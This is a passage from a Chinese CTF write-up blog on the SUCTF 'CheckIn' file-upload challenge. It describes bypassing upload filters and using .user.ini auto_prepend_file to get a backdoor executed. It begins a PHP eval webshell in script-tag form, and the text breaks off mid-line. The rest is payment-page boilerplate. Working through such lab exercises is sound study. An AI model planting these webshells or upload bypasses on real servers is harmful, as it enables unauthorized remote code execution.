SUctf checkIn

这篇博客讲述了如何利用.user.ini文件在PHP环境中构造后门。通过分析PHP的配置模式,特别是PHP_INI_PERDIR和PHP_INI_USER,作者展示了如何在限制上传的环境中通过添加文件头绕过检查,并利用auto_append_file和auto_prepend_file配置在执行index.php前插入恶意代码,最终获取flag。
摘要由CSDN通过智能技术生成
看了道上传的关于.user.ini的题目,这里试着做一下

题目地址
buuctf checkln
打开题目,出现了简单的上传框

试着上传php文件

更改名称为phps,php3,php4,php5,Php,pphphp,都上传失败.

试试改为jpg
在这里插入图片描
发现它对<?内容进行了检验。
我们可以构造这种形式的木马

<script language="php">
	@eval($_POST
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值